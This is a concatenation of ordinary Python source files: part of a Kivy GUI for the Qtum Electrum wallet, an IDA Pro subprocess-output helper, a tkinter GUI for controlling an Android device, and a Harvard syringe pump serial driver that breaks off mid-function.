currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of qtum_electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='qtum_electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='qtum_electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_forkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
print('on_network_event', event)
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
print('update_wallet')
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Qtum Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast_transaction(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
|
process.py | """
Both method redirects stdout to IDA Pro's console.
"""
from __future__ import print_function
import sys
import threading
import time
from subprocess import Popen as _Popen, PIPE, STDOUT
from PyQt5.QtCore import QCoreApplication
if sys.version_info.major == 3:
import queue as Queue
else:
import Queue
class Popen(_Popen):
"""
Subclass of :py:meth:`subprocess.Popen` that
if stdout is not given, it'll redirect stdout to messages window.
"""
def __init__(self, *args, **kwargs):
if 'stdout' not in kwargs:
kwargs['stdout'] = PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = STDOUT
queue = Queue.Queue()
done = []
# Now launch the process
super(Popen, self).__init__(*args, **kwargs)
t_reader = threading.Thread(
target=self._reader, args=(done, queue,))
t_receiver = threading.Thread(
target=self._receiver, args=(done, queue,))
t_reader.start()
t_receiver.start()
self.threads = t_reader, t_receiver
else:
# No need to do anything
super(Popen, self).__init__(*args, **kwargs)
@staticmethod
def _receiver(done, queue):
buff = []
last_output_time = time.time()
stdout = getattr(sys.stdout, 'buffer', sys.stdout)
while not (done and queue.empty()):
cur_time = time.time()
if last_output_time < cur_time - 0.01:
stdout.write(b''.join(buff).replace(b'\r', b''))
last_output_time = cur_time
buff[:] = []
try:
item = queue.get(timeout=0.01)
except Queue.Empty:
continue
buff.append(item)
queue.task_done()
stdout.write(b''.join(buff).replace(b'\r', b''))
def _reader(self, done, queue):
while True:
byte = self.stdout.read(1)
if not byte:
done.append(True)
break
queue.put(byte)
def system(cmd):
"""
Wrapper around :py:meth:`os.system`, except that output will be redirected to messages window.
:param cmd: Command to execute.
:return: exit status.
:rtype: int
"""
process = Popen(cmd, shell=True)
# call processEvents() to prevent hang
timeout = 0.01
while all(thread.is_alive() for thread in process.threads):
for thread in process.threads:
thread.join(timeout)
QCoreApplication.processEvents()
return process.wait()
if __name__ == '__main__':
print(system('pip install requests'))
|
maingui.py | import sys, threading, time
import tkinter as tk
from PIL import Image, ImageTk
from androidcom import AndroidCOM
"""
GUI for AndroidCOM with tkinter
"""
class MainGUI(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.root = master
self.ac = AndroidCOM()
self.total_width = self.ac.cfg['GUI'].getint('window_width')
self.interval_image = self.ac.cfg['GUI'].getint('interval_image')
self.interval_status = self.ac.cfg['GUI'].getint('interval_status')
self.root.title("AndroidCOM")
self.grid()
self.createMsg()
self.createImage()
self.createMenu()
def createMsg(self):
self.msgBox = tk.Message(self.root, width=self.total_width, text="")
self.msgBox.grid(row=0,column=1,columnspan=3)
def updateMsg(self,msg):
self.msgBox.configure(text=msg)
def getImageTk(self):
im = Image.open(self.ac.getScreenshot())
wpercent = (self.total_width/float(im.size[0]))
hsize = int((float(im.size[1])*float(wpercent)))
im = im.resize((self.total_width, hsize), Image.ANTIALIAS)
return ImageTk.PhotoImage(im)
def createImage(self):
self.ph = self.getImageTk()
self.imageLbl = tk.Label(self.root,image=self.ph)
self.imageLbl.image = self.ph
self.imageLbl.grid(row=1,column=1,columnspan=3)
if self.ac.cfg['GUI'].getboolean('autopull_image'):
self.root.after(self.interval_image, self.updateImage)
def updateImage(self,repeat=True):
self.ph = self.getImageTk()
self.imageLbl.configure(image=self.ph)
if repeat:
self.root.after(self.interval_image, lambda:self.cmd(self.updateImage))
def cmd(self,cmdtext):
t = threading.Thread(target=cmdtext,name="androidcom_thread")
t.daemon = True
t.start()
def onClickWifi(self):
if self.wifiVal: self.cmd(self.ac.enableWifi)
else: self.cmd(self.ac.disableWifi)
def createMenu(self):
self.menubar = tk.Menu(self.root)
settingsmenu = tk.Menu(self.menubar, tearoff = 0)
self.createSettingsOptions(settingsmenu)
statusmenu = tk.Menu(self.menubar, tearoff = 0)
self.createStatusOptions(statusmenu)
self.menubar.add_cascade(label="Settings", menu=settingsmenu)
self.menubar.add_cascade(label="Status", menu=statusmenu)
self.root.config(menu=self.menubar)
def toggleBrightness(self):
if self.brightVal.get(): self.cmd(self.ac.setBrightnessMedium)
else: self.cmd(self.ac.setBrightnessLow)
def createSettingsOptions(self,settingsmenu):
connStatus = self.ac.statusConnections()
powerStatus = self.ac.statusPower()
# Wifi-row
self.wifiVal = tk.BooleanVar()
self.wifiVal.set(connStatus['wifi_enabled'])
settingsmenu.add_checkbutton(label="Wifi", variable=self.wifiVal, command=lambda:self.cmd(self.ac.toggleWifi), onvalue=True, offvalue=False)
# Bluetooth-row
self.blueVal = tk.BooleanVar()
self.blueVal.set(connStatus['bluetooth_enabled'])
settingsmenu.add_checkbutton(label="Bluetooth", variable=self.blueVal, command=lambda:self.cmd(self.ac.toggleBluetooth), onvalue=True, offvalue=False)
# Lock/Unlock-row
self.lockVal = tk.BooleanVar()
self.lockVal.set(powerStatus['display_off'])
settingsmenu.add_checkbutton(label="Locker", variable=self.lockVal, command=lambda:self.cmd(self.ac.toggleScreen), onvalue=True, offvalue=False)
# Brightness-row
self.brightVal = tk.BooleanVar()
self.brightVal.set(False)
settingsmenu.add_checkbutton(label="Brightness", variable=self.brightVal, command=self.toggleBrightness, onvalue=True, offvalue=False)
self.root.after(self.interval_status, self.updateValues)
def createStatusOptions(self,statusmenu):
statusmenu.add_command(label="Power", command=self.printPower)
statusmenu.add_command(label="Connections", command=self.printConnections)
statusmenu.add_command(label="Notifications", command=self.printNotifications)
statusmenu.add_command(label="Windows", command=self.printWindows)
def printPower(self):
print(self.ac.statusPower())
def printConnections(self):
print(self.ac.statusConnections())
def printNotifications(self):
print(self.ac.statusNotifications())
def printWindows(self):
print(self.ac.statusWindows())
def updateValues(self):
#self.updateMsg("Updating values...")
connStatus = self.ac.statusConnections()
powerStatus = self.ac.statusPower()
self.wifiVal.set(connStatus['wifi_enabled'])
self.blueVal.set(connStatus['bluetooth_enabled'])
self.lockVal.set(powerStatus['display_off'])
#self.updateMsg("Values updated")
self.root.after(self.interval_status, lambda:self.cmd(self.updateValues))
if __name__ == '__main__':
root = tk.Tk()
app = MainGUI(master=root)
app.mainloop()
|
pump.py | import serial
import logging
import re
import threading
from time import sleep
def remove_crud(string):
"""Return string without useless information.
Return string with trailing zeros after a decimal place, trailing
decimal points, and leading and trailing spaces removed.
"""
if "." in string:
string = string.rstrip('0')
string = string.lstrip('0 ')
string = string.rstrip(' .')
return string
def convert_units(val, fromUnit, toUnit):
""" Convert flowrate units. Possible volume values: ml, ul, pl; possible time values: hor, min, sec
:param fromUnit: unit to convert from
:param toUnit: unit to convert to
:type fromUnit: str
:type toUnit: str
:return: float
"""
time_factor_from = 1
time_factor_to = 1
vol_factor_to = 1
vol_factor_from = 1
if fromUnit[-3:] == "sec":
time_factor_from = 60
elif fromUnit == "hor": # does it really return hor?
time_factor_from = 1/60
else:
pass
if toUnit[-3:] == "sec":
time_factor_to = 1/60
elif toUnit[-3:] == "hor":
time_factor_to = 60
else:
pass
if fromUnit[:2] == "ml":
vol_factor_from = 1000
elif fromUnit[:2] == "nl":
vol_factor_from = 1/1000
elif fromUnit[:2] == "pl":
vol_factor_from = 1/1e6
else:
pass
if toUnit[:2] == "ml":
vol_factor_to = 1/1000
elif toUnit[:2] == "nl":
vol_factor_to = 1000
elif toUnit[:2] == "pl":
vol_factor_to = 1e6
else:
pass
return val * time_factor_from * time_factor_to * vol_factor_from * vol_factor_to
def convert_str_units(abbr):
""" Convert string units from serial units m, u, p and s, m, h to full strings.
:param abbr: abbreviated unit
:type abbr: str
:return: str
"""
first_part = abbr[0] + "l"
if abbr[2] == "s":
second_part = "sec"
elif abbr[2] == "m":
second_part = "min"
elif abbr[2] == "h":
second_part = "hor" # is that true?
else:
raise ValueError("Unknown unit")
resp = first_part + "/" + second_part
return resp
class Chain(serial.Serial):
"""Create Chain object.
Harvard syringe pumps are daisy chained together in a 'pump chain'
off a single serial port. A pump address is set on each pump. You
must first create a chain to which you then add Pump objects.
Chain is a subclass of serial.Serial. Chain creates a serial.Serial
instance with the required parameters, flushes input and output
buffers (found during testing that this fixes a lot of problems) and
logs creation of the Chain. Adapted from pumpy on github.
"""
def __init__(self, port, baudrate=115200):
"""
:param port: Port of pump at PC
:type port: str
"""
serial.Serial.__init__(self, port=port, stopbits=serial.STOPBITS_TWO, parity=serial.PARITY_NONE, bytesize=serial.EIGHTBITS, xonxoff= False, baudrate = baudrate, timeout=2)
self.flushOutput()
self.flushInput()
logging.info('Chain created on %s',port)
class Pump:
"""Create Pump object for Harvard Pump.
Argument:
Chain: pump chain
Optional arguments:
address: pump address. Default is 0.
name: used in logging. Default is Ultra.
"""
def __init__(self, chain, address=0, name='Ultra'):
self.name = name
self.serialcon = chain
self.address = '{0:02.0f}'.format(address)
self.diameter = None
self.flowrate = None
self.targetvolume = None
self.state = None
"""Query model and version number of firmware to check pump is
OK. Responds with a load of stuff, but the last three characters
are XXY, where XX is the address and Y is pump status. :, > or <
when stopped, running forwards, or running backwards. Confirm
that the address is correct. This acts as a check to see that
the pump is connected and working."""
try:
self.write('ver')
resp = self.read(17)
if int(resp[0:2]) != int(self.address):
raise PumpError('No response from pump at address %s' %
self.address)
if resp[2] == ':':
self.state = 'idle'
elif resp[2] == '>':
self.state = 'infusing'
elif resp[2] == '<':
self.state = 'withdrawing'
else:
raise PumpError('%s: Unknown state encountered' % self.name)
except PumpError:
self.serialcon.close()
raise
logging.info('%s: created at address %s on %s', self.name,
self.address, self.serialcon.port)
def __repr__(self):
string = ''
for attr in self.__dict__:
string += '%s: %s\n' % (attr,self.__dict__[attr])
return string
def write(self, command):
""" Write serial command to pump.
:param command: command to write
:type command: str
"""
self.serialcon.write((self.address + command + '\r').encode())
def read(self, bytes=5):
""" Read serial stream from pump.
:param bytes: number of bytes to read
:type bytes: int
:return: str
"""
response = self.serialcon.read(bytes)
if len(response) == 0:
pass
# raise PumpError('%s: no response to command' % self.name)
else:
response = response.decode()
response = response.replace('\n', '')
return response
def setdiameter(self, diameter):
"""Set syringe diameter (millimetres).
Pump syringe diameter range is 0.1-35 mm. Note that the pump
ignores precision greater than 2 decimal places. If more d.p.
are specificed the diameter will be truncated.
:param diameter: syringe diameter
:type diameter: float
"""
if self.state == 'idle':
if diameter > 35 or diameter < 0.1:
raise PumpError('%s: diameter %s mm is out of range' %
(self.name, diameter))
str_diameter = "%2.2f" % diameter
# Send command
self.write('diameter ' + str_diameter)
resp = self.read(80).splitlines()
last_line = resp[-1]
# Pump replies with address and status (:, < or >)
if (last_line[2] == ':' or last_line[2] == '<' or last_line[2] == '>'):
# check if diameter has been set correctlry
self.write('diameter')
resp = self.read(45)
returned_diameter = remove_crud(resp[3:9])
# Check diameter was set accurately
if float(returned_diameter) != diameter:
logging.error('%s: set diameter (%s mm) does not match diameter'
' returned by pump (%s mm)', self.name, diameter,
returned_diameter)
elif float(returned_diameter) == diameter:
self.diameter = float(returned_diameter)
logging.info('%s: diameter set to %s mm', self.name,
self.diameter)
else:
raise PumpError('%s: unknown response to setdiameter' % self.name)
else:
print("Please wait until pump is idle.\n")
def setwithdrawrate(self, flowrate, unit):
"""Set withdraw rate.
The pump will tell you if the specified flow rate is out of
range. This depends on the syringe diameter. See Pump manual.
:param flowrate: withdrawing flowrate
:type flowrate: float
:param unit: unit of flowrate. can be [m,u,p]/[h,m,s]
:type unit: str
"""
if self.state == 'idle':
self.write('wrate ' + str(flowrate) + ' ' + unit)
resp = self.read(7)
if (resp[2] == ':' or resp[2] == '<' or resp[2] == '>'):
# Flow rate was sent, check it was set correctly
self.write('wrate')
resp = self.read(150).splitlines()[0]
if 'Argument error' in resp:
raise PumpError('%s: flow rate (%s %s) is out of range' %
(self.name, flowrate, unit))
idx1 = resp.find(str(flowrate)[0])
idx2 = resp.find("l/")
returned_flowrate = remove_crud(resp[idx1:idx2-1])
returned_unit = resp[idx2-1:idx2+5]
returned_flowrate = convert_units(float(returned_flowrate), returned_unit, convert_str_units(unit))
if returned_flowrate != flowrate:
logging.error('%s: set flowrate (%s %s) does not match'
'flowrate returned by pump (%s %s)',
self.name, flowrate, unit, returned_flowrate, unit)
elif returned_flowrate == flowrate:
self.flowrate = returned_flowrate
logging.info('%s: flow rate set to %s uL/min', self.name,
self.flowrate)
else:
raise PumpError('%s: unknown response' % self.name)
else:
print("Please wait until pump is idle.\n")
def setinfusionrate(self, flowrate, unit):
"""Set infusion rate.
The pump will tell you if the specified flow rate is out of
range. This depends on the syringe diameter. See Pump manual.
:param flowrate: withdrawing flowrate
:type flowrate: float
:param unit: unit of flowrate. can be [m,u,p]/[h,m,s]
:type unit: str
"""
if self.state == "idle":
self.write('irate ' + str(flowrate) + ' ' + unit)
resp = self.read(17)
if (":" in resp or "<" in resp or ">" in resp):
# Flow rate was sent, check it was set correctly
self.write('irate')
resp = self.read(150)
if 'error' in resp:
raise PumpError('%s: flow rate (%s %sl) is out of range' %
(self.name, flowrate, unit))
matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
if matches is None:
raise PumpError("Syringe volume could not be found")
else:
returned_flowrate = matches.group(1)
returned_unit = matches.group(2)
returned_flowrate = convert_units(float(returned_flowrate), returned_unit, convert_str_units(unit))
if returned_flowrate != flowrate:
logging.error('%s: set flowrate (%s %s) does not match'
'flowrate returned by pump (%s %s)',
self.name, flowrate, unit, returned_flowrate, unit)
elif returned_flowrate == flowrate:
self.flowrate = returned_flowrate
logging.info('%s: flow rate set to %s uL/min', self.name,
self.flowrate)
else:
raise PumpError('%s: unknown response' % self.name)
else:
print("Please wait until pump is idle.\n")
def infuse(self):
"""Start infusing pump."""
if self.state == 'idle':
self.write('irun')
resp = self.read(55)
if "Command error" in resp:
error_msg = resp.splitlines()[1]
raise PumpError('%s: %s', (self.name, error_msg))
# pump doesn't respond to serial commands while infusing
self.state = "infusing"
threading.Thread(target=self.waituntilfinished)
else:
print("Please wait until the pump is idle before infusing.\n")
def waituntilfinished(self):
""" Try to read pump state and return it. """
while self.state == "infusing" or self.state == "withdrawing":
try:
resp = self.read(5)
if 'T*' in resp:
self.state = "idle"
return "finished"
except:
pass
def withdraw(self):
"""Start withdrawing pump."""
if self.state == 'idle':
self.write('wrun')
resp = self.read(85)
if "Command error" in resp:
error_msg = resp.splitlines()[1]
raise PumpError('%s: %s', (self.name, error_msg))
# pump doesn't respond to serial commands while withdrawing
self.state = "withdrawing"
threading.Thread(target=self.waituntilfinished)
else:
print("Please wait until the pump is idle before withdrawing.\n")
def settargetvolume(self, targetvolume, unit):
"""Set target volume.
The pump will tell you if the specified target volume is out of
range. This depends on the syringe. See Pump manual.
:param targetvolume: target volume
:type targetvolume: float
:param unit: unit of targetvolume. Can be [m,u,p]
:type unit: str
"""
if self.state == 'idle':
self.write('tvolume ' + str(targetvolume) + ' ' + unit)
resp = self.read(7)
if True:
# Target volume was sent, check it was set correctly
self.write('tvolume')
resp = self.read(150)
if 'Target volume not set' in resp:
raise PumpError('%s: Target volume (%s %s) could not be set' %
(self.name, targetvolume, unit))
matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
if matches is None:
raise PumpError("Syringe volume could not be found")
else:
returned_targetvolume = matches.group(1)
returned_unit = matches.group(2)
returned_targetvolume = convert_units(float(returned_targetvolume), returned_unit + "/min", convert_str_units(unit + "/min"))
if returned_targetvolume != targetvolume:
logging.error('%s: set targetvolume (%s %s) does not match'
'targetvolume returned by pump (%s %s)',
self.name, targetvolume, unit, returned_targetvolume, unit)
elif returned_targetvolume == targetvolume:
self.targetvolume = returned_targetvolume
logging.info('%s: target volume set to %s %s', self.name,
self.targetvolume, convert_str_units(unit + "/min")[:2])
else:
raise PumpError('%s: unknown response' % self.name)
else:
print("Please wait until pump is idle.\n")
def gettargetvolume(self):
"""Get target volume.
:return: str
"""
# Target volume was sent, check it was set correctly
self.write('tvolume')
resp = self.read(150)
if 'Target volume not set' in resp:
raise PumpError('%s: Target volume not be set' %
self.name)
matches = re.search(r"(\d+\.?\d*) ([mup][l])", resp)
if matches is None:
raise PumpError("Target value could not be found")
else:
returned_targetvolume = matches.group(1)
returned_unit = matches.group(2)
rtn_str = returned_targetvolume + " " + returned_unit
return rtn_str
def setsyringevolume(self, vol, unit):
""" Sets syringe volume.
:param vol: volume of syringe
:param unit: volume unit, can be [m, u, p]
:type vol: float
:type unit: str
"""
if self.state == 'idle':
self.write('svolume ' + str(vol) + ' ' + unit + 'l')
resp = self.read(10)
if (resp[-1] == ':' or resp[-1] == '<' or resp[-1] == '>'):
# Volume was sent, check it was set correctly
volume_str = self.getsyringevolume()
returned_volume = volume_str[:-3]
returned_unit = volume_str[-2:]
returned_volume = convert_units(float(returned_volume), returned_unit + "/min", convert_str_units(unit + "/min"))
if returned_volume != vol:
